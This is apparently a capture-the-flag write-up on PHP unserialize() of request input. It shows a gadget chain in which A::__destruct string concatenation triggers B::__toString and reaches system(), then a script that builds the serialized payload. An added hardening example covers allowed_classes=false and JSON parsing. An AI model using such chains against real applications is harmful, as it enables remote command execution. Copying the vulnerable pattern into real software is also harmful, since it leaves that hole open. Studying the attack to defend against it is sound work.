[web] - Deserialization - __toString
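<?php
highlight_file(__FILE__);
class A{
    public $s;
    public function __destruct()
    {
        // Runs when the object is destroyed; the concatenation uses $this->s as a string
        echo "hello".$this->s;
    }
}
class B{
    public $cmd;
    public function __toString()
    {
        // Sink: runs whatever command the property holds
        system($this->cmd);
        return 1;
    }
}
// User-controlled input is deserialized with no class restrictions
unserialize($_GET['code']);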
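__toString() is invoked automatically whenever an object is used as a string.
Start: "hello".$this->s;
End: system($this->cmd);
Springboard: "hello".$this->s;
If $s holds a B object, the string concatenation in A::__destruct() calls B::__toString(), which in turn reaches system($this->cmd).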
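The following script builds the object chain and prints its serialized form:
<?php
highlight_file(__FILE__);
class A{
    public $s;
    public function __destruct()
    {
        echo "hello".$this->s;
    }
}
class B{
    public $cmd;
    public function __toString()
    {
        system($this->cmd);
        return "1";
    }
}
$a = new A();
$b = new B();
$b->cmd='dir';      // command that B::__toString() will pass to system()
$a->s=$b;           // A::$s holds the B object, so the concatenation triggers __toString()
echo serialize($a); // prints the serialized string shown below
?>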
O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}
The execution result is as follows:
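As an added example (not code from the original post), the PHP script below feeds the serialized string printed above to the same class shapes and compares plain unserialize() with unserialize() restricted by allowed_classes, then shows a JSON-based alternative. B::__toString() records the command instead of calling system(), and B::$reached and parse_code_param() are names assumed for this illustration.

```php
<?php
// Added example: same class shapes as the challenge, but B::__toString()
// records the command instead of calling system(), so nothing is executed.
class A {
    public $s;
    public function __destruct() {
        echo "hello" . $this->s;       // concatenation triggers __toString() on objects
    }
}
class B {
    public $cmd;
    public static $reached = [];       // constructed instrumentation, not on the page
    public function __toString() {
        self::$reached[] = $this->cmd; // stands in for system($this->cmd)
        return "1";
    }
}

// The serialized string printed on this page.
$input = 'O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}';

// 1) Challenge behaviour: classes are instantiated and the destructor runs the chain.
$obj = unserialize($input);
unset($obj);                           // forces A::__destruct()
echo "\nunrestricted: sink reached " . count(B::$reached) . " time(s)\n";

// 2) Hardened: no class named in the input is instantiated.
B::$reached = [];
$obj = unserialize($input, ['allowed_classes' => false]);
echo get_class($obj) . "\n";           // __PHP_Incomplete_Class
unset($obj);                           // no A::__destruct(), no __toString()
echo "allowed_classes=false: sink reached " . count(B::$reached) . " time(s)\n";

// 3) Preferred for request parameters: a data-only format, validated explicitly.
function parse_code_param(string $raw): array {
    $data = json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($data) || !isset($data['s']) || !is_string($data['s'])) {
        throw new InvalidArgumentException('unexpected shape');
    }
    return ['s' => $data['s']];        // plain strings only, never objects
}
var_dump(parse_code_param('{"s":"world"}'));
```

With allowed_classes set to false, every object in the input becomes __PHP_Incomplete_Class, so neither magic method in the chain is ever called.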
Original article: https://blog.csdn.net/mails2008/article/details/140502561